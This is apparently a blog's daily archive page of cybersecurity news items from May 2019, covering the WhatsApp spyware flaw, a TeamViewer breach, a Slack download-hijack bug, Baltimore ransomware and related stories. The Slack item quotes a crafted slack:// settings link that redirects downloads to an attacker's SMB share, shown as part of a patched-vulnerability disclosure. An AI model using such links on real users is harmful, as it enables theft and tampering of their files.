Daily Archives: May 17, 2019

Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Related: WhatsApp spyware attack was attempt to hack human rights data, says lawyer

Related: WhatsApp hack: have I been affected and what should I do?

Continue reading...

Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

China-linked hackers breached German software company behind TeamViewer in 2016, this news was reported by the German newspaper Der Spiegel

teamviewer

According to the media outlet, Chinese state-sponsored hackers used the
Winnti trojan malware to infect the systems of the Company.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially-motivated and was mostly involved in cyber espionage campaigns.  The hackers were known for targeting companies in the online gaming industry, the majority of the victims is located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted by the hackers in autumn 2016, when its experts detected suspicious activities were quickly blocked them to prevent major damages.

TeamViewer spokesperson revealed that the company investigated the attempts of intrusion, but did not find any evidence of exposure for customer data and sensitive data.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

At the time the company published a statement to exclude it was breached by hackers:

Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

I’m one of the finalists thanks to your support

https://www.surveymonkey.com/r/secbloggerwards2016

Thank you

Pierluigi

Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services,

Security researcher David Wells from Tenable discovered a critical flaw in version 3.3.7 of the Slack desktop app that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that that is it possible to use slack:// links to change change Slack app settings if clicked, including the
PrefSSBFileDownloadPath setting that specifies the location where a user’s files are downloaded. An attacker could use a specially crafted link that when clicked, changes the targeted user’s download destination to a path specified by the attacker, for example, a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”

Slack download

Wells also discovered that an attacker could manipulate the downloaded file stored in the location they set up.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

An attacker can inject malware into an Office file downloaded by the victim.

The links devised by the expert can be pasted to a Slack channel or a private conversation to which the attacker has access.

But, is it possible to paste the link to Slack channels where attackers are not part of?

The expert discovered that an unauthenticated attacker can change the location of downloaded files using RSS feeds. Slack channels, in fact. can subscribe to RSS feeds to populate a channel with site updates which can contain links. 

In this case, the hacker has to trick the victim into clicking on a specially crafted RSS feed link posted online. The download location can be changed even if the attacker has not access to the victim’s Slack workspace.

Lets consider an example with reddit.com, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked.” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to,”

The flaw has been classified as “medium severity” because it required user interaction. Slack awarded $500 the researcher under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)

The post A flaw in Slack could allow hackers to steal, manipulate downloaded files appeared first on Security Affairs.

How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability

A new WhatsApp vulnerability has attracted the attention of the press and security professionals around the world. We wanted to provide some information and a quick summary.

This post will cover vulnerability analysis and how McAfee MVISION Mobile can help.

Background

On May 13th, Facebook announced a vulnerability associated with all of its WhatsApp products. This vulnerability was reportedly exploited in the wild, and it was designated as CVE-2019-3568.

WhatsApp told the BBC its security team was the first to identify the flaw. It shared that information with human rights groups, selected security vendors and the US Department of Justice earlier this month.

The CVE-2019-3568 Vulnerability Explained

WhatsApp suffers from a buffer overflow weakness, meaning an attacker can leverage it to run malicious code on the device. Data packets can be manipulated during the start of a voice call, leading to the overflow being triggered and the attacker commandeering the application. Attackers can then deploy surveillance tools to the device to use against the target.

A buffer overflow vulnerability in WhatsApp VOIP (voice over internet protocol) stack allows remote code execution via a specially-crafted series of SRTP (secure real-time transport protocol) packets sent to a target phone number.

Affected Versions:

  • WhatsApp for Android prior to v2.19.134
  • WhatsApp Business for Android prior to v2.19.44
  • WhatsApp for iOS prior to v2.19.51
  • WhatsApp Business for iOS prior to v2.19.51
  • WhatsApp for Windows Phone prior to v2.18.348
  • WhatsApp for Tizen prior to v2.18.15.

The Alleged Exploit

An exploit of the vulnerability was used in an attempted attack on the phone of a UK-based attorney on 12 May, the  Financial Times reported. The reported attack involved using WhatsApp’s voice calling function to ring a target’s device. Even if the call was not picked up, the surveillance software could be installed.

How MVISION Mobile can combat CVE-2019-3568 Attacks

To date, the detection technology inside MVISION Mobile has detected 100 percent of zero-day device exploits without requiring an update.

MVISION Mobile helps protect customers by identifying at-risk iOS and Android devices and active threats trying to leverage the vulnerability. It leverages Advanced App Analysis capabilities to help administrators find all devices that are exposed to the WhatsApp vulnerability by identifying all devices that have the vulnerable versions of WhatsApp on them and establish custom policies to address the risk. If the exploit attempts to elevate privileges and compromise the device, MVISION Mobile would detect the attack on the device.

For more information about MVISION Mobile, download our datasheet or visit our web site.

The post How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability appeared first on McAfee Blogs.

New research: How effective is basic account hygiene at preventing hijacking


Every day, we protect users from hundreds of thousands of account hijacking attempts. Most attacks stem from automated bots with access to third-party password breaches, but we also see phishing and targeted attacks. Earlier this year, we suggested how just five simple steps like adding a recovery phone number can help keep you safe, but we wanted to prove it in practice.
We teamed up with researchers from New York University and the University of California, San Diego to find out just how effective basic account hygiene is at preventing hijacking. The year-long study, on wide-scale attacks and targeted attacks, was presented on Wednesday at a gathering of experts, policy makers, and users called The Web Conference.
Our research shows that simply adding a recovery phone number to your Google Account can block up to 100% of automated bots, 99% of bulk phishing attacks, and 66% of targeted attacks that occurred during our investigation.


Google’s automatic, proactive hijacking protection
We provide an automatic, proactive layer of security to better protect all our users against account hijacking. Here’s how it works: if we detect a suspicious sign-in attempt (say, from a new location or device), we’ll ask for additional proof that it’s really you. This proof might be confirming you have access to a trusted phone or answering a question where only you know the correct response.
If you’ve signed into your phone or set up a recovery phone number, we can provide a similar level of protection to 2-Step Verification via device-based challenges. We found that an SMS code sent to a recovery phone number helped block 100% of automated bots, 96% of bulk phishing attacks, and 76% of targeted attacks. On-device prompts, a more secure replacement for SMS, helped prevent 100% of automated bots, 99% of bulk phishing attacks and 90% of targeted attacks.


Both device- and knowledge-based challenges help thwart automated bots, while device-based challenges help thwart phishing and even targeted attacks.

If you don’t have a recovery phone number established, then we might fall back on the weaker knowledge-based challenges, like recalling your last sign-in location. This is an effective defense against bots, but protection rates for phishing can drop to as low as 10%. The same vulnerability exists for targeted attacks. That’s because phishing pages and targeted attackers can trick you into revealing any additional identifying information we might ask for.
Given the security benefits of challenges, one might ask why we don’t require them for all sign-ins. The answer is that challenges introduce additional friction and increase the risk of account lockout. In an experiment, 38% of users did not have access to their phone when challenged. Another 34% of users could not recall their secondary email address.
If you lose access to your phone, or can’t solve a challenge, you can always return to a trusted device you previously logged in from to gain access to your account.


Digging into “hack for hire” attacks
Where most bots and phishing attacks are blocked by our automatic protections, targeted attacks are more pernicious. As part of our ongoing efforts to monitor hijacking threats, we have been investigating emerging “hack for hire” criminal groups that purport to break into a single account for a fee on the order of $750 USD. These attackers often rely on spear phishing emails that impersonate family members, colleagues, government officials, or even Google. If the target doesn’t fall for the first spear phishing attempt, follow-on attacks persist for upwards of a month.


Example man-in-the-middle phishing attack that checks for password validity in real-time. Afterwards, the page prompts victims to disclose SMS authentication codes to access the victim’s account.

We estimate just one in a million users face this level of risk. Attackers don’t target random individuals though. While the research shows that our automatic protections can help delay, and even prevent as many as 66% of the targeted attacks that we studied, we still recommend that high-risk users enroll in our Advanced Protection Program. In fact, zero users that exclusively use security keys fell victim to targeted phishing during our investigation.



Take a moment to help keep your account secure
Just like buckling a seat belt, take a moment to follow our five tips to help keep your account secure. As our research shows, one of the easiest things you can do to protect your Google Account is to set up a recovery phone number. For high-risk users—like journalists, activists, business leaders, and political campaign teams—our Advanced Protection Program provides the highest level of security. You can also help protect your non-Google accounts from third-party password breaches by installing the Password Checkup Chrome extension.

1 Minute Quick Privacy Ref-ernces

If you have a moment take a look at our 1 minute videos to get caught up on the latest things going on in the privacy community. California Consumer Protection Act – Ben Siegel discusses the California Consumer Protection Act and how some of the advancing Amendments can drastically change the CCPA. Privacy Awareness Ideas […]

The post 1 Minute Quick Privacy Ref-ernces appeared first on Privacy Ref Blog.

Cisco AMP for Endpoints excelling in AV Comparatives Business Main Test Series

AV-Comparatives have long been the benchmark of 3rdparty testing in the endpoint security space. This year, for the first time ever, AMP for Endpoints participated in AV-Comparatives malware testing. The Business Main Test Series was broken up into two main sections: the Malware Protection Test and Business Real-World Protection Test.

While the full report will be released in July, AV-Comparatives released a short fact sheet today. Because the test is only partially completed, the results will continue to vary, but Cisco AMP for Endpoints expects to maintain consistently high scores.

Overview

First, let’s give the brief facts behind the Business Main Test Series:

  • 19 products are participating
  • All products tested on a Windows 10 RS5 64-bit
  • All vendors were allowed to configure their products
  • Cloud and PUA detection activated in all products

Given these parameters, the 19 products will participate in a fourth month test culminating in July. At this midpoint, however, the products have participated in the two aforementioned tests.

For more information on specific configurations and a list of all participants, read the full fact sheet here.

Malware Protection Test 

In this test, the products were tested with 1,311 different malware samples. Based on criteria defined by AV-Comparatives in their report, the products were given parameters to detect the malware samples.

So far, AMP for Endpoints is one of eight products to have a malware protection rate of 99.8% or higher. In addition to this extremely high detection rate, AMP for Endpoints registered 0 false alarms on common business software.

AV-Comparatives also performed tests on non-business software. This will not affect the final “Approved Business Product” rating they deliver, but the results are notable as it helps to demonstrates how well a product can really delineate between good and bad. Cisco AMP for Endpoints was granted the highest rating of “very low “which denotes 0-5 false positives on non-business software.

Cisco AMP for Endpoints consistently pledges to deliver elite threat detection, investigation, and response. The 99.8% malware protection rate so far highlights Cisco AMP for Endpoint’s ability to deliver on that pledge. At the same time, the low number of false positives shows that Cisco AMP for Endpoints does not need to bog down IT professionals with useless alerts allowing them to focus on what’s really important.

Real-World Protection Test

Over the course of two months, the products encountered 389 test cases. Of the 389 test cases, Cisco AMP For Endpoints has blocked all but three while producing ZERO false alarms. Resulting in a 99.2% protection rate so far. Cisco AMP For Endpoints is only one of three products to have zero false alarms. Others have already flagged up to 18 false alarms.

Conclusion

It is important to note that this test has not concluded. We are, however, very excited for a continued strong showing from Cisco AMP for Endpoints in the second half of the test. So far, Cisco AMP for Endpoints has already shown an elite combination of threat detection, investigation, and response combined with low false positives designed to empower IT professionals to quickly identify and respond to threats.

For more on the report, click here.

To try AMP for Endpoints for free, sign up for the free trial.

Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware

Reading Time: ~2 min.

WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts by having the phone swapped to a SIM card in their control. The group would then fraudulently access cryptocurrency accounts by bypassing 2-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that scripts for the “Trust Seals” provided by Best of the Web to highly-rated websites were compromised and redesigned to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still linking customers to the compromised seals. This type of supply chain attack has risen in popularity recently. Hackers have been seen injecting payment stealing malware into several large online retailer’s websites since the beginning of the year.

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Cisco addressed a critical flaw in networks management tool Prime Infrastructure

Cisco had issued security updates to address 57 security flaw, including three flaws in networks management tool Prime Infrastructure.

One of the flaws addressed by Cisco in the Prime Infrastructure management tool could be exploited by an unauthenticated attacker to execute arbitrary code with root privileges on PI devices.

“Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system.” reads the advisory published by Cisco.

“One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface.”

The remaining two issues, tracked as CVE-2019-1822 and CVE-2019-1823, could be exploited by an attacker that has valid credentials to authenticate to the impacted administrative interface.

The flaws affect Cisco Prime Infrastructure Software releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1.

The vulnerabilities were discovered by Steven Seeley of Source Incite.

“These vulnerabilities exist because the software improperly validates user-supplied input,” continues the advisory. “An attacker could exploit these vulnerabilities by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.”

Cisco PSIRT experts are aware of any attacks exploiting the flaws in the wild.

Cisco Prime Infrastructure

A few days ago, Cisco fixed the Thrangrycat, a vulnerability tracked as CVE-2019-1649 that affects multiple Cisco products supporting the Trust Anchor module (TAm). The issue could be exploited by an attacker to fully bypass Cisco’s Trust Anchor module (TAm) via Field Programmable Gate Array (FPGA) bitstream manipulation.

Pierluigi Paganini

(SecurityAffairs – Cisco Prime infrastructure, hacking)

The post Cisco addressed a critical flaw in networks management tool Prime Infrastructure appeared first on Security Affairs.

This Week in Security News: Unsecured Servers and Vulnerable Processors

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about vulnerabilities that can allow hackers to retrieve data from CPUs and mine cryptocurrency.

Read on:

May’s Patch Tuesday Include Fixes for ‘Wormable’ Flaw in Windows XP, Zero-Day Vulnerability

Microsoft’s May security release includes updates for 80 vulnerabilities for a number of Microsoft products, including a security update for unsupported operating systems such as Windows XP and Server 2003.

Trend Micro Unveils Cloud-Native Security Customized to the Demand of DevOps

Trend Micro launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack.

Side-Channel Attacks RIDL, Fallout, and ZombieLoad Affect Millions of Vulnerable Intel Processors

Researchers found a bevy of critical vulnerabilities in modern Intel processors that, when exploited successfully, can leak or let hackers retrieve data being processed by the vulnerable CPUs.

Trump Issues Executive Order Paving Way for Ban on Huawei

President Trump has issued an executive order declaring a national emergency and prohibiting U.S. companies from using telecom services that are solely owned, controlled, or directed by a foreign adversary, clearing the way for a ban on the Chinese-owned Huawei.

Unsecured Server Leaks PII of Almost 90% of Panama Residents

The personally identifiable information of almost 90% of Panama’s population has been divulged due to an unsecured Elasticsearch server that was found without authentication or firewall protection, connected to the internet, and publicly viewable on any browser.

Google Discloses Security Bug in its Bluetooth Titan Security Keys, Offers Free Replacement

Google says that the security bug, which could allow an attacker in close physical proximity to circumvent the security the key is supposed to provide, is due to a “misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols.”

Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner

Threat actors were found exploiting CVE-2018-1000861, a vulnerability in the Stapler web framework that is used by the Apache Jenkins open-source software development automation server with versions 2.153 and earlier.

Crypto Exchange Binance Restarting Services After Post-Hack Upgrade

Cryptocurrency exchange Binance has announced that it is back online after completing a security upgrade prompted by a recent hack that saw 7,000 BTC worth $41 million stolen.

Do you worry about your personally identifiable information being divulged to cyber criminals? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

 

 

The post This Week in Security News: Unsecured Servers and Vulnerable Processors appeared first on .

Download Hijack Flaw Patched in Slack Patches for Windows

Download Hijack Flaw Patched in Slack Patches for Windows

Slack users have been urged to upgrade their applications and clients to the most recent version, 3.4.0, after Tenable researcher David Wells discovered a new vulnerability that would allow an attacker to share malicious hyperlinks that could alter where a victim’s files were stored.

Wells discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. “This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium),” today’s press release said.

If users click on the link, an attacker could not only steal future documents downloaded within Slack but also manipulate them, such as injecting malicious code that would compromise the victim’s machine once opened, according to Wells.

The attack reportedly can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated.

“Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," which Wells discusses in depth in his blog post.

The flaw was found in the Slack desktop application for Windows version 3.3.7, which Tenable reported to Slack via HackerOne. “Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to upgrade their apps and clients to the latest available version,” a Slack spokesperson said.

“The digital economy and global distributed workforce have brought new technologies to market with the ultimate goal of seamless connectivity,” said Renaud Deraison, co-founder and chief technology officer, Tenable. “But it’s critical that organizations realize this emerging technology is potentially vulnerable and part of their expanding attack surface. Tenable Research continues to work with vendors such as Slack to disclose our discoveries to ensure consumers and organizations are secure.”

Epsiode 495 – Tools, Tips and Tricks – Mozilla Observatory

This week’s tools, tips and tricks is about Mozilla Obersvatory. This is a web scanner meant to help developers and security professionals fix and make their web apps more secure. Mozilla Observatory. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to subscribe […]

The post Epsiode 495 – Tools, Tips and Tricks – Mozilla Observatory appeared first on Security In Five.

More Orgs Use Booby Traps for Counterintelligence

More Orgs Use Booby Traps for Counterintelligence

A recent survey found that to gain counterintelligence the vast majority of organizations would allow an attacker to take decoy files rather than stop an attack in progress, according to the latest International Cyber Benchmark Index from the Neustar International Security Council (NISC).

A reported one in five companies are currently employing forensic investigations, as well as setting up honey pots and repositories of fake data to lure attackers in, but an impressive 71% of respondents said that instead of shutting down an attack when a bad actor accesses a deceptive file, they would be willing to let the malicious actors take booby-trapped document, according to a May 16 press release.

Being able to collect intelligence could allow defenders to identify thieves in the future, potentially revealing information about the location, ownership and possible vulnerabilities of the hackers’ machines, the press release said.

Of the respondents surveyed, 51% said their enterprise had suffered a distributed denial-of-service (DDoS) attack, and 52% of participants also identified phishing as a growing threat with targeted hacking. DDoS attacks followed close behind at 49%.

“Security leaders increasingly feel that breaches are inevitable, and there is a growing appetite for advanced forensic tools that can deliver insights around attacker attribution and tactics in real time,” said Rodney Joffe, chairman of NISC and Neustar SVP and fellow.

“Whether they opt to use them like an alarm system, ejecting bad actors from the network upon contact with a honey pot or deceptive file, or for a more sophisticated counterintelligence operation that gathers vital information on attacker movements and methods, cybersecurity professionals want solutions that can provide better real-time awareness and understanding of the enemy.”

According to the survey, the threat of social engineering continues to rise across all vectors, with 48% of respondents admitting they witnessed an uptick in attempts via email, 38% noting a rise in text-based attempts and 36% reporting a rise in attempts via phone.

Responses showed that security pros are more aware not only of where attacks are originating but also of the types of attacks that pose the greatest threats.

Baltimore Won’t Pay Ransom, Systems Remain Down

Baltimore Won't Pay Ransom, Systems Remain Down

The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers warning that if the city called the FBI they would cut off contact, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear – the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

WhatsApp Will Never be Safe, Says Telegram Founder

In a direct attack on WhatsApp, Telegram founder Pavel Durov has stated that the Facebook-owned WhatsApp would never be safe.

In a statement that he had written on Telegraph Pavel Durov points out that hackers could access anything- photos, emails, texts etc- on any phone that had WhatsApp installed on it. He even discusses the security issue that WhatsApp recently faced- that of a high severity bug that could allow hackers to inject spyware remotely into a phone simply by making a WhatsApp call.

Durov writes, “Every time WhatsApp has to fix a critical vulnerability in their app, a new one seems to appear in its place. All of their security issues are conveniently suitable for surveillance, and look and work a lot like backdoors.”

He points out that unlike Telegram, WhatsApp is not an open source platform and hence it never allows security researchers to easily check if there are backdoors in its code. Instead of publishing its code, WhatsApp deliberately obfuscates their apps’ binaries so that no one is able to study them thoroughly, he adds.

Durov explains that back in 2012, when he was working to develop Telegram, WhatsApp was still transferring messages in plain-text in transit and not just governments or hackers, but mobile providers and even Wi-Fi admins had access to all WhatsApp texts.

WhatsApp later added some encryption, but the key to decrypt messages was available with several governments, who could thus decrypt conversations on WhatsApp very easily. Durov says, “Then, as Telegram started to gain popularity, WhatsApp founders sold their company to Facebook and declared that “Privacy was in their DNA”. If true, it must have been a dormant or a recessive gene.”

Discussing how the end-to-end encryption introduced in 2016 by WhatsApp works, Pavel Durov says, “3 years ago WhatsApp announced they implemented end-to-end encryption so “no third party can access messages“. It coincided with an aggressive push for all of its users to back up their chats in the cloud. When making this push, WhatsApp didn’t tell its users that when backed up, messages are no longer protected by end-to-end encryption and can be accessed by hackers and law enforcement. Brilliant marketing, and some naive people are serving their time in jail as a result.”

Durov also explains that those who don’t go for the backup thing could also be traced in many ways. He says that the metadata generated by WhatsApp users is leaked to different agencies in large volumes by WhatsApp’s mother company. Added to all this, there are critical vulnerabilities coming one after the other.

He writes, “WhatsApp has a consistent history – from zero encryption at its inception to a succession of security issues strangely suitable for surveillance purposes. Looking back, there hasn’t been a single day in WhatsApp’s 10 year journey when this service was secure. That’s why I don’t think that just updating WhatsApp’s mobile app will make it secure for anyone.”

In his statement, Durov explains why people can’t stop using WhatsApp all of a sudden. He says that a lot of people can’t do this because their friends and families still continue to use WhatsApp. He writes, “It means we at Telegram did a bad job of persuading people to switch over. While we did attract hundreds of millions of users in the last five years, this wasn’t enough. The majority of internet users are still held hostage by the Facebook/WhatsApp/Instagram empire. Many of those who use Telegram are also on WhatsApp, meaning their phones are still vulnerable.”

Durov says this about Telegram- “In almost 6 years of its existence, Telegram hasn’t had any major data leak or security flaw of the kind WhatsApp demonstrates every few months. In the same 6 years, we disclosed exactly zero bytes of data to third-parties, while Facebook/WhatsApp has been sharing pretty much everything with everybody who claimed they worked for a government.”

He explains that unlike Facebook, which has a huge marketing department, Telegram does zero marketing and wouldn’t want to pay journalists and researchers to write about it. It instead relies on its users.

Well, that’s the gist of what the Telegram founder has to say. Let’s wait for the other side of the story. Let’s wait and see if WhatsApp comes up with its own statements defending itself, in response to what all Pavel Durov had written.

Source: https://gbhackers.com/whatsapp-will-never-be-secure/

 

Related Resources:

A Quick Glimpse On The WhatsApp “Spyware” Issue

The WhatsApp Gold Scam is Back, in a New Form!

WhatsApp Launches Service to Fight Fake News in India

SpyDealer Android Malware Steals Data from WhatsApp and Facebook

The post WhatsApp Will Never be Safe, Says Telegram Founder appeared first on .

Why Are Cryptographers Being Denied Entry into the US?

In March, Adi Shamir -- that's the "S" in RSA -- was denied a US visa to attend the RSA Conference. He's Israeli.

This month, British citizen Ross Anderson couldn't attend an awards ceremony in DC because of visa issues. (You can listen to his recorded acceptance speech.) I've heard of at least one other prominent cryptographer who is in the same boat. Is there some cryptographer blacklist? Is something else going on? A lot of us would like to know.

Stack Overflow Discloses Digital Attack against Production Systems

Stack Overflow, a popular question and answer site for programmers, disclosed a digital attack in which bad actors accessed its production systems. Mary Ferguson, VP of Engineering at the company, publicly revealed the incident on 16 May. In a statement posted to Stack Overflow’s website, she explained that someone had obtained production-level access to the […]… Read More

The post Stack Overflow Discloses Digital Attack against Production Systems appeared first on The State of Security.

Hacktivist Attacks Have Fallen 95% Since 2015

Hacktivist Attacks Have Fallen 95% Since 2015

The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number attributed to the Anonymous dropped from eight incidents in 2015 to only one tracked in 2018. This is significant as the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested received sentences in 2018 and 2019 with jail time of three years or greater. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence after DDoS-ing a Boston hospital in 2014.

Facebook Bans Israeli Firm For Election Meddling

Facebook Bans Israeli Firm For Election Meddling

Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

Originating in Israel, the moves targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads paid for in Brazilian reals, Israeli shekel, and US dollars. They ran from 2012 to 2019, which raises questions about why they weren’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Europol and US Police Disrupt $100m Cybercrime Gang

